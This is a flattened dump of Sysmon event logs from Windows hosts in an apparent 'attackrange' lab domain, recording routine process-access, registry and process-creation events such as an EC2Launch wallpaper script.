Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8646414734AB8A30AAB06110A4E79B25,SHA256=0A9F9704880AA92C8BE1676A9C8BF2459069E21C7C17A16CFC4785086380BFF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980899Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:58.853{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4F1590198145C9F8FB4623729346988,SHA256=484AFD9A2C054816C02CE3D8B6C9CEFEB8DA303AF83B3C091FAFE858BAABB25D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:58.028{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB7E3C5369F0B3DD18A7083B6C1C2DC,SHA256=B0370B6E464D51B142700A6AC31CB154018B982274AFBF43034D474B17BD2DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:59.869{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B6494B26F74C185800ECB84E026A1BB,SHA256=1C973C000DFED53F34A1E33C4D07CA9573290A715622D84A2C6E2E41428ECAA0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000980909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000980908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd77fe2) 13241300x8000000000000000980907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0xbdcdae02) 13241300x8000000000000000980906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b381-0x1f921602) 13241300x8000000000000000980905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b389-0x81567e02) 13241300x8000000000000000980904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000980903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0fd77fe2) 13241300x8000000000000000980902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7b378-0xbdcdae02) 13241300x8000000000000000980901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7b381-0x1f921602) 13241300x8000000000000000980900Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:21:59.869{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7b389-0x81567e02) 10341000x80000000000000001055972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.575{5EBD8912-8D37-6151-9C00-00000000FD01}40324896C:\Windows\system32\conhost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055967Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055966Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.559{5EBD8912-8D37-6151-9B00-00000000FD01}4052856C:\Windows\system32\cmd.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.568{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "Import-Module "C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Ec2Launch.psd1"; Set-Wallpaper"C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetup.cmd" " 10341000x80000000000000001055964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.544{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.544{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.544{5EBD8912-8D2A-6151-9600-00000000FD01}46324956C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.544{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.544{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46321196C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46321196C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46321196C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46321196C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.528{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.513{5EBD8912-8CC0-6151-1600-00000000FD01}12961944C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.513{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.497{5EBD8912-8D37-6151-9C00-00000000FD01}40324896C:\Windows\system32\conhost.exe{5EBD8912-8D37-6151-9B00-00000000FD01}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.497{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D37-6151-9C00-00000000FD01}4032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:59.481{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 